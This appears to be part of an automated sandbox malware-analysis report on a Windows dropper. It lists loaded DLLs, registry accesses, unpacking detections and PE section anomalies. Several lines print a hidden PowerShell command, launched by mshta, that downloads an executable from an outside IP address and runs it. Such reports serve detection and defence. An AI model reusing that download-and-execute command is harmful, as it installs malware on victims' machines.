Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe	Section loaded: wldp.dll

Source: C:\Users\user\Desktop\0xqfQZufeQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Google Drive.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Cleaner.lnk.13.dr	LNK file: ..\AppData\Local\Temp\5DWsYef8WwGeGz5\Y-Cleaner.exe

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: 0xqfQZufeQ.exe

Static file information: File size 1916416 > 1048576

Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: 0xqfQZufeQ.exe

Static PE information: Raw size of xzmpyxck is bigger than: 0x100000 < 0x1a2200

Source:	Binary string: mozglue.pdbP source: 0f39a8c7db.exe, 00000008.00000002.2524620028.000000006C4BD000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: nss3.pdb@ source: 0f39a8c7db.exe, 00000008.00000002.2529505786.000000006C67F000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: nss3.pdb source: 0f39a8c7db.exe, 00000008.00000002.2529505786.000000006C67F000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: mozglue.pdb source: 0f39a8c7db.exe, 00000008.00000002.2524620028.000000006C4BD000.00000002.00000001.01000000.00000015.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Unpacked PE file: 0.2.0xqfQZufeQ.exe.a60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xzmpyxck:EW;jnfkrtlw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xzmpyxck:EW;jnfkrtlw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 2.2.axplong.exe.d30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xzmpyxck:EW;jnfkrtlw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xzmpyxck:EW;jnfkrtlw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 6.2.axplong.exe.d30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xzmpyxck:EW;jnfkrtlw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xzmpyxck:EW;jnfkrtlw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Unpacked PE file: 8.2.0f39a8c7db.exe.e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dxkyhxuw:EW;bdeytton:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dxkyhxuw:EW;bdeytton:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Unpacked PE file: 9.2.8166ff9922.exe.3b0000.0.unpack :EW;.rsrc:W;.idata :W;rihpxjyu:EW;fruizeat:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;rihpxjyu:EW;fruizeat:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Unpacked PE file: 13.2.3f28c42ac4.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jccfkdhg:EW;hwvitiin:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 14.2.skotes.exe.60000.0.unpack :EW;.rsrc:W;.idata :W;rihpxjyu:EW;fruizeat:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;rihpxjyu:EW;fruizeat:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Unpacked PE file: 15.2.0f39a8c7db.exe.e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dxkyhxuw:EW;bdeytton:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dxkyhxuw:EW;bdeytton:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Unpacked PE file: 16.2.382cd038a3.exe.8a0000.0.unpack :EW;.rsrc:W;.idata :W;stadzsnm:EW;tsmjrbki:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;stadzsnm:EW;tsmjrbki:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Unpacked PE file: 22.2.8166ff9922.exe.3b0000.0.unpack :EW;.rsrc:W;.idata :W;rihpxjyu:EW;fruizeat:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;rihpxjyu:EW;fruizeat:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Unpacked PE file: 23.2.eb74aeb58b.exe.b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zqjesnms:EW;itcibofp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zqjesnms:EW;itcibofp:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Unpacked PE file: 25.2.0f39a8c7db.exe.e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dxkyhxuw:EW;bdeytton:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dxkyhxuw:EW;bdeytton:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	Unpacked PE file: 26.2.8f4d1353d2.exe.540000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dxkyhxuw:EW;bdeytton:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dxkyhxuw:EW;bdeytton:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Unpacked PE file: 28.2.8166ff9922.exe.3b0000.0.unpack :EW;.rsrc:W;.idata :W;rihpxjyu:EW;fruizeat:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;rihpxjyu:EW;fruizeat:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Unpacked PE file: 53.2.1f1ada1ce1.exe.810000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hvnpreno:EW;wfgtnlfw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hvnpreno:EW;wfgtnlfw:EW;.taggant:EW;

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

Source: Y-Cleaner.exe.13.dr

Static PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe

Code function: 8_2_6C4AC410 LoadLibraryW,GetProcAddress,FreeLibrary,

8_2_6C4AC410

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[1].exe.6.dr	Static PE information: real checksum: 0x1c6fe0 should be: 0x1bf6c7
Source: random[1].exe.14.dr	Static PE information: real checksum: 0x1d7761 should be: 0x1dbd81
Source: soft[1].13.dr	Static PE information: real checksum: 0x0 should be: 0x170243
Source: 8166ff9922.exe.6.dr	Static PE information: real checksum: 0x2e292c should be: 0x2e375d
Source: dll[1].13.dr	Static PE information: real checksum: 0x0 should be: 0x400e1
Source: eb74aeb58b.exe.14.dr	Static PE information: real checksum: 0x1d0dd0 should be: 0x1cca80
Source: random[1].exe0.6.dr	Static PE information: real checksum: 0x2e292c should be: 0x2e375d
Source: Y-Cleaner.exe.13.dr	Static PE information: real checksum: 0x0 should be: 0x170243
Source: 0xqfQZufeQ.exe	Static PE information: real checksum: 0x1d6a64 should be: 0x1db8d4
Source: random[1].exe1.6.dr	Static PE information: real checksum: 0x1e9f1e should be: 0x1dfee1
Source: Bunifu_UI_v1.5.3.dll.13.dr	Static PE information: real checksum: 0x0 should be: 0x400e1
Source: random[3].exe.14.dr	Static PE information: real checksum: 0x1d0dd0 should be: 0x1cca80
Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1d6a64 should be: 0x1db8d4
Source: 382cd038a3.exe.6.dr	Static PE information: real checksum: 0x6375a6 should be: 0x637c28
Source: 0f39a8c7db.exe.6.dr	Static PE information: real checksum: 0x1c6fe0 should be: 0x1bf6c7
Source: skotes.exe.9.dr	Static PE information: real checksum: 0x2e292c should be: 0x2e375d
Source: 3f28c42ac4.exe.6.dr	Static PE information: real checksum: 0x1e9f1e should be: 0x1dfee1
Source: random[2].exe.6.dr	Static PE information: real checksum: 0x6375a6 should be: 0x637c28

Source: 0xqfQZufeQ.exe	Static PE information: section name:
Source: 0xqfQZufeQ.exe	Static PE information: section name: .idata
Source: 0xqfQZufeQ.exe	Static PE information: section name:
Source: 0xqfQZufeQ.exe	Static PE information: section name: xzmpyxck
Source: 0xqfQZufeQ.exe	Static PE information: section name: jnfkrtlw
Source: 0xqfQZufeQ.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: xzmpyxck
Source: axplong.exe.0.dr	Static PE information: section name: jnfkrtlw
Source: axplong.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: dxkyhxuw
Source: random[1].exe.6.dr	Static PE information: section name: bdeytton
Source: random[1].exe.6.dr	Static PE information: section name: .taggant
Source: 0f39a8c7db.exe.6.dr	Static PE information: section name:
Source: 0f39a8c7db.exe.6.dr	Static PE information: section name: .idata
Source: 0f39a8c7db.exe.6.dr	Static PE information: section name:
Source: 0f39a8c7db.exe.6.dr	Static PE information: section name: dxkyhxuw
Source: 0f39a8c7db.exe.6.dr	Static PE information: section name: bdeytton
Source: 0f39a8c7db.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name: rihpxjyu
Source: random[1].exe0.6.dr	Static PE information: section name: fruizeat
Source: random[1].exe0.6.dr	Static PE information: section name: .taggant
Source: 8166ff9922.exe.6.dr	Static PE information: section name:
Source: 8166ff9922.exe.6.dr	Static PE information: section name: .idata
Source: 8166ff9922.exe.6.dr	Static PE information: section name: rihpxjyu
Source: 8166ff9922.exe.6.dr	Static PE information: section name: fruizeat
Source: 8166ff9922.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe1.6.dr	Static PE information: section name:
Source: random[1].exe1.6.dr	Static PE information: section name: .idata
Source: random[1].exe1.6.dr	Static PE information: section name:
Source: random[1].exe1.6.dr	Static PE information: section name: jccfkdhg
Source: random[1].exe1.6.dr	Static PE information: section name: hwvitiin
Source: random[1].exe1.6.dr	Static PE information: section name: .taggant
Source: 3f28c42ac4.exe.6.dr	Static PE information: section name:
Source: 3f28c42ac4.exe.6.dr	Static PE information: section name: .idata
Source: 3f28c42ac4.exe.6.dr	Static PE information: section name:
Source: 3f28c42ac4.exe.6.dr	Static PE information: section name: jccfkdhg
Source: 3f28c42ac4.exe.6.dr	Static PE information: section name: hwvitiin
Source: 3f28c42ac4.exe.6.dr	Static PE information: section name: .taggant
Source: random[2].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name: .idata
Source: random[2].exe.6.dr	Static PE information: section name: stadzsnm
Source: random[2].exe.6.dr	Static PE information: section name: tsmjrbki
Source: random[2].exe.6.dr	Static PE information: section name: .taggant
Source: 382cd038a3.exe.6.dr	Static PE information: section name:
Source: 382cd038a3.exe.6.dr	Static PE information: section name: .idata
Source: 382cd038a3.exe.6.dr	Static PE information: section name: stadzsnm
Source: 382cd038a3.exe.6.dr	Static PE information: section name: tsmjrbki
Source: 382cd038a3.exe.6.dr	Static PE information: section name: .taggant
Source: nss3[1].dll.8.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.8.dr	Static PE information: section name: .00cfg
